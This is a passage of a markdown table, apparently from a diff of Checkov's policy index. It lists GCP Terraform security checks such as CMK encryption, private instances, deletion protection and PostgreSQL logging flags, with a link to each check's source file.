google_bigtable_instance | Ensure Big Table Instances are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigTableInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceEncryptedWithCMK.py) | +| 1706 | CKV_GCP_86 | resource | google_cloudbuild_worker_pool | Ensure Cloud build workers are private | Terraform | [CloudBuildWorkersArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudBuildWorkersArePrivate.py) | +| 1707 | CKV_GCP_87 | resource | google_data_fusion_instance | Ensure Data fusion instances are private | Terraform | [DataFusionPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionPrivateInstance.py) | +| 1708 | CKV_GCP_88 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted mysql access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3306.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py) | +| 1709 | CKV_GCP_89 | resource | google_notebooks_instance | Ensure Vertex AI instances are private | Terraform | [VertexAIPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIPrivateInstance.py) | +| 1710 | CKV_GCP_90 | resource | google_dataflow_job | Ensure data flow jobs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [DataflowJobEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowJobEncryptedWithCMK.py) | +| 1711 | CKV_GCP_91 | resource | google_dataproc_cluster | Ensure Dataproc cluster is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [DataprocClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocClusterEncryptedWithCMK.py) | +| 1712 | CKV_GCP_92 | resource | google_vertex_ai_dataset | Ensure Vertex AI datasets uses a CMK (Customer Managed Key) | Terraform | [VertexAIDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIDatasetEncryptedWithCMK.py) | +| 1713 | CKV_GCP_93 | resource | google_spanner_database | Ensure Spanner Database is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [SpannerDatabaseEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseEncryptedWithCMK.py) | +| 1714 | CKV_GCP_94 | resource | google_dataflow_job | Ensure Dataflow jobs are private | Terraform | [DataflowPrivateJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowPrivateJob.py) | +| 1715 | CKV_GCP_95 | resource | google_redis_instance | Ensure Memorystore for Redis has AUTH enabled | Terraform | [MemorystoreForRedisAuthEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisAuthEnabled.py) | +| 1716 | CKV_GCP_96 | resource | google_vertex_ai_metadata_store | Ensure Vertex AI Metadata Store uses a CMK (Customer Managed Key) | Terraform | [VertexAIMetadataStoreEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIMetadataStoreEncryptedWithCMK.py) | +| 1717 | CKV_GCP_97 | resource | google_redis_instance | Ensure Memorystore for Redis uses intransit encryption | Terraform | [MemorystoreForRedisInTransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisInTransitEncryption.py) | +| 1718 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_binding | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) | +| 1719 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_member | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) | +| 1720 | CKV_GCP_99 | resource | google_pubsub_topic_iam_binding | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) | +| 1721 | CKV_GCP_99 | resource | google_pubsub_topic_iam_member | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) | +| 1722 | CKV_GCP_100 | resource | google_bigquery_table_iam_binding | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) | +| 1723 | CKV_GCP_100 | resource | google_bigquery_table_iam_member | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) | +| 1724 | CKV_GCP_101 | resource | google_artifact_registry_repository_iam_binding | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) | +| 1725 | CKV_GCP_101 | resource | google_artifact_registry_repository_iam_member | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) | +| 1726 | CKV_GCP_102 | resource | google_cloud_run_service_iam_binding | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) | +| 1727 | CKV_GCP_102 | resource | google_cloud_run_service_iam_member | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) | +| 1728 | CKV_GCP_103 | resource | google_dataproc_cluster | Ensure Dataproc Clusters do not have public IPs | Terraform | [DataprocPublicIpCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPublicIpCluster.py) | +| 1729 | CKV_GCP_104 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver logging enabled | Terraform | [DataFusionStackdriverLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverLogs.py) | +| 1730 | CKV_GCP_105 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver monitoring enabled | Terraform | [DataFusionStackdriverMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverMonitoring.py) | +| 1731 | CKV_GCP_106 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted http port 80 access | Terraform | [GoogleComputeFirewallUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress80.py) | +| 1732 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | +| 1733 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | +| 1734 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | +| 1735 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | +| 1736 | CKV_GCP_108 | resource | google_sql_database_instance | Ensure hostnames are logged for GCP PostgreSQL databases | Terraform | [GoogleCloudPostgreSqlLogHostname.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogHostname.py) | +| 1737 | CKV_GCP_109 | resource | google_sql_database_instance | Ensure the GCP PostgreSQL database log levels are set to ERROR or lower | Terraform | [GoogleCloudPostgreSqlLogMinErrorStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinErrorStatement.py) | +| 1738 | CKV_GCP_110 | resource | google_sql_database_instance | Ensure pgAudit is enabled for your GCP PostgreSQL database | Terraform | [GoogleCloudPostgreSqlEnablePgaudit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlEnablePgaudit.py) | +| 1739 | CKV_GCP_111 | resource | google_sql_database_instance | Ensure GCP PostgreSQL logs SQL statements | Terraform | [GoogleCloudPostgreSqlLogStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogStatement.py) | +| 1740 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_binding | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | +| 1741 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_member | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | +| 1742 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_policy | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | +| 1743 | CKV_GCP_113 | data | google_iam_policy | Ensure IAM policy should not define public access | Terraform | [GooglePolicyIsPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/gcp/GooglePolicyIsPrivate.py) | +| 1744 | CKV_GCP_114 | resource | google_storage_bucket | Ensure public access prevention is enforced on Cloud Storage bucket | Terraform | [GoogleStoragePublicAccessPrevention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStoragePublicAccessPrevention.py) | +| 1745 | CKV_GCP_115 | resource | google_organization_iam_binding | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) | +| 1746 | CKV_GCP_115 | resource | google_organization_iam_member | Ensure basic roles are not used at organization level. | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py) | +| 1747 | CKV_GCP_116 | resource | google_folder_iam_binding | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) | +| 1748 | CKV_GCP_116 | resource | google_folder_iam_member | Ensure basic roles are not used at folder level. | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py) | +| 1749 | CKV_GCP_117 | resource | google_project_iam_binding | Ensure basic roles are not used at project level. | Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) | +| 1750 | CKV_GCP_117 | resource | google_project_iam_member | Ensure basic roles are not used at project level. | Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py) | +| 1751 | CKV_GCP_118 | resource | google_iam_workload_identity_pool_provider | Ensure IAM workload identity pool provider is restricted | Terraform | [GoogleIAMWorkloadIdentityConditional.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleIAMWorkloadIdentityConditional.py) | +| 1752 | CKV_GCP_119 | resource | google_spanner_database | Ensure Spanner Database has deletion protection enabled | Terraform | [SpannerDatabaseDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDeletionProtection.py) | +| 1753 | CKV_GCP_120 | resource | google_spanner_database | Ensure Spanner Database has drop protection enabled | Terraform | [SpannerDatabaseDropProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDropProtection.py) | +| 1754 | CKV_GCP_121 | resource | google_bigquery_table | Ensure BigQuery tables have deletion protection enabled | Terraform | [BigQueryTableDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableDeletionProtection.py) | +| 1755 | CKV_GCP_122 | resource | google_bigtable_instance | Ensure Big Table Instances have deletion protection enabled | Terraform | [BigTableInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceDeletionProtection.py) | +| 1756 | CKV_GCP_123 | resource | google_container_cluster | GKE Don't Use NodePools in the Cluster configuration | Terraform | [GKEDontUseNodePools.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDontUseNodePools.py) | +| 1757 | CKV_GCP_124 | resource | google_cloudfunctions2_function | Ensure GCP Cloud Function is not configured with overly permissive Ingress setting | Terraform | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py) | +| 1758 | CKV_GCP_124 | resource | google_cloudfunctions_function | Ensure GCP Cloud Function is not configured with overly permissive Ingress setting | Terraform | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py) | +| 1759 | CKV2_GCP_1 | resource | google_project_default_service_accounts | Ensure GKE clusters are not running using the Compute Engine default service account | Terraform | [GKEClustersAreNotUsingDefaultServiceAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GKEClustersAreNotUsingDefaultServiceAccount.yaml) | +| 1760 | CKV2_GCP_2 | resource | google_compute_network | Ensure legacy networks do not exist for a project | Terraform | [GCPProjectHasNoLegacyNetworks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPProjectHasNoLegacyNetworks.yaml) | +| 1761 | CKV2_GCP_3 | resource | google_service_account_key | Ensure that there are only GCP-managed service account keys for each service account | Terraform | [ServiceAccountHasGCPmanagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/ServiceAccountHasGCPmanagedKey.yaml) | +| 1762 | CKV2_GCP_4 | resource | google_logging_folder_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | +| 1763 | CKV2_GCP_4 | resource | google_logging_organization_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | +| 1764 | CKV2_GCP_4 | resource | google_logging_project_sink | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | +| 1765 | CKV2_GCP_4 | resource | google_storage_bucket | Ensure that retention policies on log buckets are configured using Bucket Lock | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml) | +| 1766 | CKV2_GCP_5 | resource | google_project | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) | +| 1767 | CKV2_GCP_5 | resource | google_project_iam_audit_config | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml) | +| 1768 | CKV2_GCP_6 | resource | google_kms_crypto_key | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | +| 1769 | CKV2_GCP_6 | resource | google_kms_crypto_key_iam_binding | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | +| 1770 | CKV2_GCP_6 | resource | google_kms_crypto_key_iam_member | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml) | +| 1771 | CKV2_GCP_7 | resource | google_sql_database_instance | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) | +| 1772 | CKV2_GCP_7 | resource | google_sql_user | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml) | +| 1773 | CKV2_GCP_8 | resource | google_kms_key_ring | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | +| 1774 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_binding | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | +| 1775 | CKV2_GCP_8 | resource | google_kms_key_ring_iam_member | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml) | +| 1776 | CKV2_GCP_9 | resource | google_container_registry | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | +| 1777 | CKV2_GCP_9 | resource | google_storage_bucket_iam_binding | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | +| 1778 | CKV2_GCP_9 | resource | google_storage_bucket_iam_member | Ensure that Container Registry repositories are not anonymously or publicly accessible | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml) | +| 1779 | CKV2_GCP_10 | resource | google_cloudfunctions_function | Ensure GCP Cloud Function HTTP trigger is secured | Terraform | [CloudFunctionSecureHTTPTrigger.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/CloudFunctionSecureHTTPTrigger.yaml) | +| 1780 | CKV2_GCP_11 | resource | google_project_services | Ensure GCP GCR Container Vulnerability Scanning is enabled | Terraform | [GCRContainerVulnerabilityScanningEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCRContainerVulnerabilityScanningEnabled.yaml) | +| 1781 | CKV2_GCP_12 | resource | google_compute_firewall | Ensure GCP compute firewall ingress does not allow unrestricted access to all ports | Terraform | [GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml) | +| 1782 | CKV2_GCP_13 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_duration' is set to 'on' | Terraform | [GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml) | +| 1783 | CKV2_GCP_14 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_executor_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml) | +| 1784 | CKV2_GCP_15 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_parser_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml) | +| 1785 | CKV2_GCP_16 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_planner_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml) | +| 1786 | CKV2_GCP_17 | resource | google_sql_database_instance | Ensure PostgreSQL database flag 'log_statement_stats' is set to 'off' | Terraform | [GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml) | +| 1787 | CKV2_GCP_18 | resource | google_compute_network | Ensure GCP network defines a firewall and does not use the default firewall | Terraform | [GCPNetworkDoesNotUseDefaultFirewall.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPNetworkDoesNotUseDefaultFirewall.yaml) | +| 1788 | CKV2_GCP_19 | resource | google_container_cluster | Ensure GCP Kubernetes engine clusters have 'alpha cluster' feature disabled | Terraform | [GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml) | +| 1789 | CKV2_GCP_20 | resource | google_sql_database_instance | Ensure MySQL DB instance has point-in-time recovery backup configured | Terraform | [GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml) | +| 1790 | CKV2_GCP_21 | resource | google_notebooks_instance | Ensure Vertex AI instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexInstanceEncryptedWithCMK.yaml) | +| 1791 | CKV2_GCP_22 | resource | google_document_ai_processor | Ensure Document AI Processors are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIProcessorEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIProcessorEncryptedWithCMK.yaml) | +| 1792 | CKV2_GCP_23 | resource | google_document_ai_warehouse_location | Ensure Document AI Warehouse Location is configured to use a Customer Managed Key (CMK) | Terraform | [GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml) | +| 1793 | CKV2_GCP_24 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIEndpointEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIEndpointEncryptedWithCMK.yaml) | +| 1794 | CKV2_GCP_25 | resource | google_vertex_ai_featurestore | Ensure Vertex AI featurestore uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAIFeaturestoreEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIFeaturestoreEncryptedWithCMK.yaml) | +| 1795 | CKV2_GCP_26 | resource | google_vertex_ai_tensorboard | Ensure Vertex AI tensorboard uses a Customer Managed Key (CMK) | Terraform | [GCPVertexAITensorboardEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAITensorboardEncryptedWithCMK.yaml) | +| 1796 | CKV2_GCP_27 | resource | google_workbench_instance | Ensure Vertex AI workbench instance disks are encrypted with a Customer Managed Key (CMK) | Terraform | [GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml) | +| 1797 | CKV2_GCP_28 | resource | google_workbench_instance | Ensure Vertex AI workbench instances are private | Terraform | [GCPVertexWorkbenchInstanceNoPublicIp.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceNoPublicIp.yaml) | +| 1798 | CKV2_GCP_29 | resource | google_dialogflow_agent | Ensure logging is enabled for Dialogflow agents | Terraform | [GCPDialogFlowAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowAgentLoggingEnabled.yaml) | +| 1799 | CKV2_GCP_30 | resource | google_dialogflow_cx_agent | Ensure logging is enabled for Dialogflow CX agents | Terraform | [GCPDialogFlowCxAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxAgentLoggingEnabled.yaml) | +| 1800 | CKV2_GCP_31 | resource | google_dialogflow_cx_webhook | Ensure logging is enabled for Dialogflow CX webhooks | Terraform | [GCPDialogFlowCxWebhookLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxWebhookLoggingEnabled.yaml) | +| 1801 | CKV2_GCP_32 | resource | google_tpu_v2_vm | Ensure TPU v2 is private | Terraform | [GCPTpuV2VmPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPTpuV2VmPrivateEndpoint.yaml) | +| 1802 | CKV2_GCP_33 | resource | google_vertex_ai_endpoint | Ensure Vertex AI endpoint is private | Terraform | 